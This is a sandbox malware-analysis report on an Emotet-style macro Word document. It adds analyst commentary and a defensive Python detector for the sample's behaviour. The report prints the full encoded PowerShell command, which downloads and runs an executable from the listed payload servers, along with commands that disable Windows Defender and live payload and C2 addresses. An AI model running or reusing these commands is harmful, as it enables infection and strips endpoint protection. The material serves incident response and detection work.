Enc_message_859897272.doc
This report is generated from a file or URL submitted to this webservice on February 25th 2019 19:32:24 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Contains a remote desktop related string
- Spyware
- POSTs files to a webserver
- Persistence
- Spawns a lot of processes
- Fingerprint
- Tries to identify its external IP address
- Evasive
- Detected document macro trying to fingerprint/evade the analysis environment
- Spreading
- Opens the MountPointManager (often used to detect additional infection locations)
- Network Behavior
- Contacts 4 domains and 11 hosts
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed in the public report.
Malicious Indicators (26)

Environment Awareness

Detected document macro trying to fingerprint/evade the analysis environment
- details: Document contains auto-execute macro and tries to obtain external IP/ISP/host information
- source: Indicator Combinations
- relevance: 10/10
- ATT&CK ID: T1063
External Systems

Detected Suricata Alert
- details:
Detected alert "ET POLICY External IP Lookup api.ipify.org" (SID: 2021997, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET POLICY Possible External IP Lookup ipinfo.io" (SID: 2020716, Rev: 4, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)" (SID: 2021013, Rev: 7, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
- source: Suricata Alerts
- relevance: 10/10

Sample was identified as malicious by a large number of Antivirus engines
- details: 12/54 Antivirus vendors marked sample as malicious (22% detection rate)
- source: External System
- relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- details: 12/54 Antivirus vendors marked sample as malicious (22% detection rate)
- source: External System
- relevance: 8/10
General

The analysis extracted a file that was identified as malicious
- details:
11/69 Antivirus vendors marked dropped file "ZPhQTlnvSsgt3fI129V.exe" as malicious (classified as "Malware.Heuristic" with 15% detection rate)
16/70 Antivirus vendors marked dropped file "46.exe" as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
11/69 Antivirus vendors marked dropped file "ZOhPSkmvRrgs3fH129U.exe" as malicious (classified as "Malware.Heuristic" with 15% detection rate)
- source: Binary File
- relevance: 10/10

The analysis spawned a process that was identified as malicious
- details:
16/70 Antivirus vendors marked spawned process "46.exe" (PID: 2412) as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
16/70 Antivirus vendors marked spawned process "46.exe" (PID: 3644) as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
16/70 Antivirus vendors marked spawned process "limewcs.exe" (PID: 3664) as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
16/70 Antivirus vendors marked spawned process "limewcs.exe" (PID: 1916) as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
11/69 Antivirus vendors marked spawned process "ZOhPSkmvRrgs3fH129U.exe" (PID: 3880) as malicious (classified as "Malware.Heuristic" with 15% detection rate)
11/69 Antivirus vendors marked spawned process "ZPhQTlnvSsgt3fI129V.exe" (PID: 1992) as malicious (classified as "Malware.Heuristic" with 15% detection rate)
- source: Monitored Target
- relevance: 10/10
Installation/Persistence

Writes data to a remote process
- details:
"powershell.exe" wrote 32 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 1624)
"powershell.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 1624)
"powershell.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 1624)
"powershell.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 1624)
"46.exe" wrote 32 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 204)
"46.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 204)
"46.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 204)
"46.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 204)
"limewcs.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\limewcs.exe" (Handle: 204)
"limewcs.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\limewcs.exe" (Handle: 204)
"limewcs.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\limewcs.exe" (Handle: 204)
"limewcs.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\limewcs.exe" (Handle: 204)
"limewcs.exe" wrote 32 bytes to a remote process "%ALLUSERSPROFILE%\ZOhPSkmvRrgs3fH129U.exe" (Handle: 556)
"limewcs.exe" wrote 52 bytes to a remote process "C:\ProgramData\ZOhPSkmvRrgs3fH129U.exe" (Handle: 556)
"limewcs.exe" wrote 4 bytes to a remote process "C:\ProgramData\ZOhPSkmvRrgs3fH129U.exe" (Handle: 556)
"limewcs.exe" wrote 8 bytes to a remote process "C:\ProgramData\ZOhPSkmvRrgs3fH129U.exe" (Handle: 556)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\sc.exe" (Handle: 136)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\sc.exe" (Handle: 136)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\sc.exe" (Handle: 136)
"cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\sc.exe" (Handle: 136)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (Handle: 136)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (Handle: 136)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (Handle: 136)
"cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (Handle: 136)
"ZPhQTlnvSsgt3fI129V.exe" wrote 32 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 52 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 4 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 8 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 544 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 72 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 22 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 1024 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 103424 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 9216 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 512 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 16 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 128 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
- source: API Call
- relevance: 6/10
- ATT&CK ID: T1055
The repeated 32/52/8/4-byte writes from a parent into the child it has just launched (cmd.exe into sc.exe and powershell.exe, 46.exe into its second 46.exe instance, limewcs.exe into its second instance and into the ZOhPSkmvRrgs3fH129U.exe dropper) are the small fixed-size writes the sandbox records for every process launch and are not injection on their own. The write pattern that does indicate injection is ZPhQTlnvSsgt3fI129V.exe writing 544, 1024, 103424 and 9216 bytes into C:\Windows\System32\svchost.exe, which is consistent with a payload being copied into a freshly spawned svchost.exe.
Network Related

Malicious artifacts seen in the context of a contacted host
- details:
Found malicious artifacts related to "35.184.61.254": ...
URL: http://35.184.61.254/tg9pzdy (AV positives: 4/66 scanned on 02/25/2019 19:29:47)
URL: http://cabootaxi.com/sendinc/legal/sec/EN_en/02-2019/ (AV positives: 1/69 scanned on 02/25/2019 18:57:52)
URL: http://35.184.61.254/tg9pzdY/ (AV positives: 5/67 scanned on 02/25/2019 17:54:56)
URL: http://35.184.61.254/ (AV positives: 1/69 scanned on 02/25/2019 16:50:17)
File SHA256: f7efe99d17566235f7cc9b4082df95c0ff271fb3bbdc05adf6462416cf3237da (AV positives: 16/67 scanned on 02/25/2019 17:55:00)
File SHA256: 831f367ce1bcabc4afb4144602c8aee7741758c55bd692b46109ed5fb02e5725 (AV positives: 21/69 scanned on 02/25/2019 15:46:08)
File SHA256: dba804f594533cf90100161f83cdff6c43e8a106bbb7207bc8829efc1c91b567 (AV positives: 23/71 scanned on 02/25/2019 14:42:26)
File SHA256: 005221508e9288483c9f817d294e07b8785a37d27358bbcdafacec2a27173c94 (AV positives: 13/71 scanned on 02/25/2019 18:03:23)
File SHA256: a45be4ef0e53658b3e66c9ebfd91cd0d93ae2e45818eabf46ea9c34569fa3f44 (AV positives: 11/72 scanned on 02/25/2019 16:53:19)
Found malicious artifacts related to "52.204.186.102": ...
URL: http://52.204.186.102/pasmkvmb (AV positives: 4/67 scanned on 02/25/2019 19:29:32)
URL: http://52.204.186.102/PASmkvmb/ (AV positives: 8/68 scanned on 02/25/2019 19:07:30)
URL: http://52.204.186.102/PASmkvmb (AV positives: 1/67 scanned on 02/25/2019 14:14:07)
URL: http://52.204.186.102/de_DE/CPFNRNIW0961547 (AV positives: 6/67 scanned on 02/25/2019 00:27:34)
URL: http://52.204.186.102/de_DE/CPFNRNIW0961547/ (AV positives: 6/67 scanned on 02/22/2019 05:57:05)
File SHA256: c5396b0030cb7720618be99dc39402d171bcba706622b92953272d4662e96944 (AV positives: 16/68 scanned on 02/25/2019 16:57:55)
File SHA256: 831f367ce1bcabc4afb4144602c8aee7741758c55bd692b46109ed5fb02e5725 (AV positives: 21/69 scanned on 02/25/2019 16:27:36)
File SHA256: dba804f594533cf90100161f83cdff6c43e8a106bbb7207bc8829efc1c91b567 (AV positives: 23/71 scanned on 02/25/2019 14:42:26)
File SHA256: 98c0ce92e61c133b514b58093e17ffa6df186e40ae7244c9cd6290ec7578b49f (AV positives: 16/60 scanned on 02/22/2019 05:57:09)
File SHA256: 50cae3ad5a58a4c52773cf8252ac8afef2ec987541c3313064295d0535969553 (AV positives: 9/54 scanned on 02/21/2019 14:42:57)
Found malicious artifacts related to "74.59.106.11": ...
URL: http://74.59.106.11:8080/ (AV positives: 2/66 scanned on 02/25/2019 15:39:29)
File SHA256: f7efe99d17566235f7cc9b4082df95c0ff271fb3bbdc05adf6462416cf3237da (AV positives: 16/69 scanned on 02/25/2019 17:09:51)
File SHA256: 005221508e9288483c9f817d294e07b8785a37d27358bbcdafacec2a27173c94 (AV positives: 13/71 scanned on 02/25/2019 18:03:23)
File SHA256: a45be4ef0e53658b3e66c9ebfd91cd0d93ae2e45818eabf46ea9c34569fa3f44 (AV positives: 11/72 scanned on 02/25/2019 16:53:19)
File SHA256: 6af59d0bcad6f54c7243c00cd9826246bbc67f62a9f1cc4d7edac39d89afe536 (AV positives: 11/71 scanned on 02/25/2019 15:54:14)
File SHA256: 82dcb24569b6990269ed9da38d289eb4793d3646f6d01d4a07bf28d839fef56a (AV positives: 11/71 scanned on 02/25/2019 15:41:39)
File SHA256: 3336ba88e2772809657105d1a6d80cda0f3226b30420cb440db87c5ac0b0b9cc (Date: 02/25/2019 15:56:05)
File SHA256: 831f367ce1bcabc4afb4144602c8aee7741758c55bd692b46109ed5fb02e5725 (Date: 02/25/2019 15:56:01)
File SHA256: 15a02fb3df8ead217a7adea0c4c539caa3739d22d8450b533dfbda438cd7c2d8 (Date: 02/25/2019 13:51:53)
File SHA256: dba804f594533cf90100161f83cdff6c43e8a106bbb7207bc8829efc1c91b567 (Date: 02/25/2019 13:51:41)
File SHA256: 75b1408f4b0e580de8ad09f5d37cabc0c49b289bbd3b7553a06d1bf06b212af6 (Date: 02/25/2019 13:51:33)
Found malicious artifacts related to "216.239.32.21": ...
URL: http://perfourjiaty.com/ (AV positives: 5/66 scanned on 02/25/2019 19:25:04)
URL: https://detikdotinfo.com/2015/12/cara-mudah-root-samsung-galaxy-v-plus.html (AV positives: 2/66 scanned on 02/25/2019 19:08:16)
URL: https://tutorapk.com/2018/04/bisnis-jasa-aktivasi-akun-smule-ke-vip_58.html (AV positives: 1/66 scanned on 02/25/2019 18:59:18)
URL: https://myexternalip.com/RAW (AV positives: 2/69 scanned on 02/25/2019 18:57:14)
URL: https://truyenngan.info/2018/11/chiec-xe-bus-ke-tiep.html (AV positives: 5/67 scanned on 02/25/2019 18:49:58)
File SHA256: 08142330655deb1526dcc56795c92eb5c13012f75b599d5ac68db4027953ed80 (AV positives: 1/56 scanned on 02/25/2019 10:39:57)
File SHA256: 626c48fc485f11caacc6e139636d7632d2ff529fe402d5f04f5a088a26849d85 (AV positives: 21/54 scanned on 02/25/2019 04:43:38)
File SHA256: 2ee63e19414fa3bc2799bb632e116ebe8fb8a298107d2e5f5cfae25704f4e620 (AV positives: 46/70 scanned on 02/25/2019 18:35:17)
File SHA256: e6d1c7c4f819ecf2ca28f891a7b12860df0ad55765b3087b41dff7586e900d71 (AV positives: 42/65 scanned on 02/25/2019 11:38:43)
File SHA256: 58dcd2107a0c0819e9d9b467a088f69ebffa6857e82998a01c5860a2ddf19e99 (AV positives: 22/67 scanned on 02/25/2019 06:54:38)
File SHA256: bd2bf858a859d2c267ee5c73ffc444fdfbbc61b853adc472d854dd7933461c66 (Date: 02/22/2019 23:46:03)
File SHA256: bf0ee7699d9e7822c1affa07445e6585bb701a9052931839e081898cb1df2152 (Date: 02/22/2019 01:27:42)
File SHA256: a2066d28cdfb396f9c5bff6798ca416da09b889b32948596ac9cdb25ed8a6317 (Date: 02/22/2019 01:26:16)
File SHA256: f1b439f19126201afcf5ada6846995a57df7fcf6fa57b25c326f73fd297f7023 (Date: 02/20/2019 20:07:08)
File SHA256: 1800f0465d02507cf67d9f59e44a7084bbaf6fcb090cc957b76a14a68e7dc32b (Date: 02/20/2019 20:01:08)
Found malicious artifacts related to "107.22.215.20": ...
URL: http://api.ipify.org/ (AV positives: 1/66 scanned on 02/21/2019 16:00:10)
URL: http://api.ipify.org:443/ (AV positives: 1/69 scanned on 02/20/2019 09:57:24)
URL: http://api.ipify.org/?format=jsonp&callback=jQuery1112024484568499775033_1550467753745&_=1550467753746 (AV positives: 1/69 scanned on 02/20/2019 06:48:06)
URL: http://nagano-19599.herokussl.com/ (AV positives: 1/66 scanned on 02/19/2019 06:26:44)
URL: https://api.ipify.org/ (AV positives: 1/69 scanned on 02/15/2019 09:46:59)
File SHA256: a38acf2c017baa93f7a9768063518daf88268e95a2fd5e9e554408aaee181c88 (AV positives: 48/66 scanned on 02/24/2019 01:10:17)
File SHA256: 114cf7a928bb7d0760217d5b5bb16a15822178778bc236918099935a3c779711 (Date: 02/24/2019 00:58:48)
File SHA256: 1fb28bb210e1763ee70a54677d214c91c9626b8d9d5d646dc08a715e40d68805 (AV positives: 21/65 scanned on 02/23/2019 01:14:42)
File SHA256: 7f52b836ccf785e1784f654fe5ed74a19bdb6c4609e41c039f2c0759de29e54b (AV positives: 26/69 scanned on 02/23/2019 13:01:07)
File SHA256: 7029b55362872e68e09c062affcefa15b26103c5ee27fb21580042e01ccd8165 (Date: 02/23/2019 05:40:11)
File SHA256: ba17c23a584cc42571ccd6bcef85cb74093e4f0638751a1055d3d810fe8370f5 (Date: 02/23/2019 01:07:14)
File SHA256: eb5701e4d7980cb83d33409ce2f51224e9b6c88c68b2abcc9dfb3b747294d66e (AV positives: 49/70 scanned on 02/22/2019 18:17:00)
File SHA256: 1bea03422e915138deb1467d90fe7f0847f023bf57bf1260e4bba6f3e640cd66 (AV positives: 20/69 scanned on 02/21/2019 06:18:04)
File SHA256: e87a81407840642482195f5de7790d3f90257ba4d798aed527bd3e7ba1cb0be2 (Date: 02/15/2019 02:24:05)
File SHA256: cd98a3ebe16fb1489c4e93950dd1b8c5e3e304f66c03f0a9d15951fdbbb57332 (Date: 02/15/2019 00:46:19)
Found malicious artifacts related to "195.123.245.16": ...
URL: http://195.123.245.16/ (AV positives: 4/67 scanned on 02/12/2019 10:37:25)
URL: http://195.123.245.16/search/irsrv.exe (AV positives: 11/67 scanned on 02/08/2019 10:32:39)
URL: http://195.123.245.16/index/index.php (AV positives: 2/66 scanned on 01/14/2019 01:20:36)
File hash: 0a88572f98aec04db9bd5fdecef2dfae6297943f (40 hex digits, i.e. SHA-1 length; the source report labels it SHA256) (Date: 02/25/2019 16:39:17)
File SHA256: 3b6de2755f17bdfbb9100268ae98c481e4a41ea0d488b304ad99af179d1412cb (Date: 02/25/2019 16:39:17)
File hash: b475abca1113f804dd0a2592c28cce16 (32 hex digits, i.e. MD5 length; the source report labels it SHA256) (Date: 02/25/2019 16:39:17)
File SHA256: 0f2529972e59d3860caa2fa59272e81414b3821e31c78fe6759931acf9757639 (AV positives: 49/70 scanned on 02/08/2019 10:32:44)
File SHA256: 01ac3c269a78c6b109f71c6a02a541bfe397e9660dce3bb7f3bac3130842c4cb (AV positives: 45/71 scanned on 01/25/2019 04:38:31)
File SHA256: a7bd27f950b89431b93cf85666c55fdca875fe3f80741c123c765e7e5d2109a7 (Date: 01/24/2019 02:04:42)
File SHA256: e95d16ab50200283a50501129b6ca1046504a065c1ca64d99843f7aee4e8b376 (AV positives: 48/70 scanned on 01/20/2019 11:03:46)
Found malicious artifacts related to "190.146.112.216": ...
URL: http://190.146.112.216/sat1/LGEB1R07V053_W617601.1310DEFB8D422F0E1F95FDBD2D9A58FE/83/ (AV positives: 8/67 scanned on 02/25/2019 13:59:27)
URL: http://190.146.112.216/sat1/LGEB1R07V053_W617601.1310DEFB8D422F0E1F95FDBD2D9A58FE/60/ (AV positives: 8/67 scanned on 02/25/2019 13:14:23)
URL: http://190.146.112.216/lib417/FMZCKAM001_W617601.589DBF39F403B3D8D70D6AFB9059ACDC/60 (AV positives: 7/67 scanned on 02/25/2019 00:51:53)
URL: http://190.146.112.216/sin12/CONF-2-W7-64S_W617601.E67C1D43F994D753499CBA99AF5723F3/60 (AV positives: 8/67 scanned on 02/25/2019 00:37:15)
URL: http://190.146.112.216/lib420/FMZEMPQ0039_W617601.2785DBCAA125CD6D7E51794633C82D47/83 (AV positives: 9/67 scanned on 02/25/2019 00:35:29)
File SHA256: 8fcb77f2be3ee5848865bb21c503aadd6b9e91265f9aa6b79fd1bb2ae5d502cf (AV positives: 30/72 scanned on 02/13/2019 08:58:35)
File SHA256: 59ef9d793f3f82b1d9bc8f8163e1bb19fb3cb58ed9c4b673798337f7c5196114 (AV positives: 20/71 scanned on 02/09/2019 00:03:41)
- source: Network Traffic
- relevance: 10/10
The artifacts listed under 107.22.215.20 are api.ipify.org lookups and those under 216.239.32.21 are unrelated third-party sites on shared hosting, so neither host says anything about this sample beyond the external-IP check. The hosts worth pivoting on are the two payload servers (35.184.61.254 and 52.204.186.102, whose /tg9pzdY and /PASmkvmb paths match the GET requests recorded below) and the beacon targets 74.59.106.11:8080 and 190.146.112.216.

Tries to identify its external IP address
- details:
"api.ipify.org"
"ipinfo.io"
- source: Network Traffic
- relevance: 6/10

System Security
Attempts to modify Windows Defender preferences
- details:
Process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
Process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true"
Process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
Process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true"
- source: Monitored Target
- relevance: 3/10

Tries to stop and delete the Windows Defender service (the source report titles this "Tries to disable/delete the windows firewall", but the commands target the WinDefend service, not the firewall service MpsSvc)
- details:
Process "sc.exe" with commandline "sc stop WinDefend"
Process "sc.exe" with commandline "sc delete WinDefend"
Process "sc.exe" with commandline "sc delete WinDefend"
Process "sc.exe" with commandline "sc stop WinDefend"
- source: Monitored Target
- relevance: 10/10
- ATT&CK ID: T1089
Both sequences are evidence of intent rather than of a successful change: the Set-MpPreference cmdlet is not shipped with Windows 7, and sc stop/delete on a service requires administrative rights. The command lines themselves are nevertheless a reliable detection signature, as they do not occur in normal administration.
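The Defender-tampering command lines above, the mixed-case encoded PowerShell launch recorded under "Spawns a lot of processes", and the reverse-octet DNSBL queries under "Found potential IP address in binary/memory" are all cheap to detect from endpoint telemetry. The following is an added example written for this page, not code from the sandbox or from the malware authors: it runs simple matchers over process-creation and DNS-query records of the shape Sysmon event IDs 1 and 22 produce. The records, the hostname and the benign entries are constructed for the example; the malicious command lines and query names are the ones in this report.

```python
"""Flag Defender tampering, encoded PowerShell launches and DNSBL self-checks
in process-creation and DNS-query records (Sysmon event ID 1 / 22 style)."""
import re

# Constructed records modelled on this report's process list and DNS queries.
# The images, the benign entries and the ordering are made up for the example.
EVENTS = [
    {"type": "process", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "process", "image": "C:\\Windows\\SysWOW64\\sc.exe",
     "cmdline": "sc stop WinDefend"},
    {"type": "process", "image": "C:\\Windows\\SysWOW64\\sc.exe",
     "cmdline": "sc delete WinDefend"},
    {"type": "process", "image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
     # opening of the report's encoded command, truncated here for length
     "cmdline": "poweRsHeLl -nop -e JABXADMAXwA1ADQANgAzAF8APQAoACcAaAA4ADYAXwAnACsAJwAwADIANAAyACcAKQA7"},
    {"type": "process", "image": "C:\\Windows\\System32\\sc.exe",
     "cmdline": "sc query WinDefend"},                      # benign: read-only
    {"type": "dns", "image": "C:\\Windows\\SysWOW64\\limewcs.exe",
     "query": "162.12.124.64.zen.spamhaus.org"},
    {"type": "dns", "image": "C:\\Windows\\SysWOW64\\limewcs.exe",
     "query": "162.12.124.64.cbl.abuseat.org"},
    {"type": "dns", "image": "C:\\Program Files\\Mail\\mta.exe",
     "query": "api.ipify.org"},                             # not a DNSBL query
]

# Any Set-MpPreference -Disable<Something> $true, not only RealtimeMonitoring.
DEFENDER_PREF = re.compile(r"set-mppreference\b.*-disable\w+\s+\$?true", re.I)
# sc stop/delete/config against the Defender service; "sc query" is left alone.
DEFENDER_SVC = re.compile(r"\bsc(?:\.exe)?\s+(stop|delete|config)\s+windefend\b", re.I)
# Case-insensitive so "poweRsHeLl" and "-E"/"-enc"/"-EncodedCommand" all match.
ENCODED_PS = re.compile(
    r"\bpowershell\b.*\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
DNSBL_ZONES = ("zen.spamhaus.org", "cbl.abuseat.org")
REVERSED_IP = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(.+)$")


def classify_cmdline(cmdline):
    """Tags for one process-creation command line (empty set = nothing seen)."""
    tags = set()
    if DEFENDER_PREF.search(cmdline):
        tags.add("defender_realtime_disabled")
    if DEFENDER_SVC.search(cmdline):
        tags.add("defender_service_tampered")
    if ENCODED_PS.search(cmdline):
        tags.add("encoded_powershell")
    return tags


def dnsbl_origin(query):
    """If `query` is a reverse-octet DNSBL lookup, return (checked_ip, zone)."""
    m = REVERSED_IP.match(query)
    if not m:
        return None
    zone = m.group(5).lower()
    if zone not in DNSBL_ZONES:
        return None
    # DNSBL names carry the octets in reverse order; put them back.
    return ".".join(m.group(i) for i in (4, 3, 2, 1)), zone


def triage(events):
    """Run both checks over a list of records; return the hits in order."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            for tag in sorted(classify_cmdline(ev["cmdline"])):
                hits.append((tag, ev["image"], ev["cmdline"]))
        elif ev["type"] == "dns":
            origin = dnsbl_origin(ev["query"])
            if origin:
                hits.append(("dnsbl_self_check", ev["image"], "%s on %s" % origin))
    return hits


if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(hit)
```

The DNSBL check is the one most often missed: a workstation process asking Spamhaus ZEN or the CBL about its own public address is a host that is about to send mail directly, and here it recovers 64.124.12.162 as the address the sample looked up.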
Unusual Characteristics

Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details: Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source: Static Parser
- relevance: 10/10
- ATT&CK ID: T1137

Contains native function calls
- details:
NtdllDefWindowProc_A@NTDLL.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880)
NtdllDefWindowProc_A@NTDLL.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992)
- source: Hybrid Analysis Technology
- relevance: 5/10

Spawns a lot of processes
- details:
Spawned process "WINWORD.EXE" with commandline "/n "C:\Enc_message_859897272.doc""
Spawned process "powershell.exe" with commandline "poweRsHeLl -nop -e JABXADMAXwA1ADQANgAzAF8APQAoACcAaAA4ADYAXwAnACsAJwAwADIANAAyACcAKQA7ACQARwA2AF8AXwAxADEANwA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMAXwAwAF8ANQBfAF8AXwA9ACgAJwBoAHQAdABwADoALwAvACcAKwAnADMANQAuADEAJwArACcAOAA0ACcAKwAnAC4ANgAxAC4AJwArACcAMgAnACsAJwA1ADQAJwArACcALwB0AGcAJwArACcAOQBwACcAKwAnAHoAZABZAEAAJwArACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwA1ADIAJwArACcALgAnACsAJwAyADAAJwArACcANAAuADEAOAA2AC4AMQAwADIALwBQAEEAUwBtACcAKwAnAGsAdgBtAGIAJwArACcAQABoAHQAdABwADoALwAvADUANAAuACcAKwAnADEANwAnACsAJwAyAC4AOAAnACsAJwA1ACcAKwAnAC4AJwArACcAMgAyACcAKwAnADEALwBUACcAKwAnAGkAMAAnACsAJwBKAGUASgB1ACcAKwAnADkAJwArACcAQABoAHQAJwArACcAdABwADoALwAvADUAMgAuACcAKwAnADcAMAAnACsAJwAuACcAKwAnADIAMwAnACsAJwA5AC4AMgAyADkALwBiACcAKwAnAGwAbwBnAC8AdwBwAC0AJwArACcAYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAvAHUAcABsAG8AJwArACcAYQBkAHMALwAnACsAJwBQAFoAOQA2AFgAJwArACcAaQBiAEUAVQBVAEAAaAB0AHQAcAAnACsAJwA6AC8ALwAyACcAKwAnADIAMgAuADEAMAA2ACcAKwAnAC4AMgAnACsAJwAxACcAKwAnADcALgAzACcAKwAnADcALwAnACsAJwB3AG8AJwArACcAcgAnACsAJwBkAHAAcgBlAHMAJwArACcAcwAvADMASQAnACsAJwAxAGUANQAnACsAJwBKAHgAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQARQBfAF8AMQA4ADYANwA9ACgAJwBjAF8AJwArACcAXwBfADQANwAnACkAOwAkAG0ANABfAF8ANQBfADIAMAAgAD0AIAAnADQANgAnADsAJABoADEANQA1ADcANAA9ACgAJwBxADQAJwArACcANAA0ADAAXwAnACkAOwAkAEoAMAA2AF8ANgA4ADQAXwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQA0AF8AXwA1AF8AMgAwACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVQBfADgANgAxADYAOQAgAGkAbgAgACQAYwBfADAAXwA1AF8AXwBfACkAewB0AHIAeQB7ACQARwA2AF8AXwAxADEANwA5AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAXwA4ADYAMQA2ADkALAAgACQASgAwADYAXwA2ADgANABfACkAOwAkAGwAOAA1AF8AXwBfAD0AKAAnAGgAJwArACcAXwBfACcAKwAnAF8AMAAzACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEoAMAA2AF8ANgA4ADQAXwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEoAMAA2AF8ANgA4ADQAXwA7ACQASQAzADcANAAyAF8AOAA9ACgAJwBMADkAMwAnACsAJwBfACcAKwAnADEAXwBfADUAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHcAXwAzADMAXwAzADQAPQAoACcAUQAyADAAJwArACcAMAAxADAAMQAnACkAOwA="
Spawned process "46.exe"
Spawned process "46.exe"
Spawned process "limewcs.exe"
Spawned process "limewcs.exe"
Spawned process "ZOhPSkmvRrgs3fH129U.exe"
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
Spawned process "cmd.exe" with commandline "/c sc stop WinDefend"
Spawned process "cmd.exe" with commandline "/c sc delete WinDefend"
Spawned process "sc.exe" with commandline "sc stop WinDefend"
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
Spawned process "ZPhQTlnvSsgt3fI129V.exe"
Spawned process "sc.exe" with commandline "sc delete WinDefend"
Spawned process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true"
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
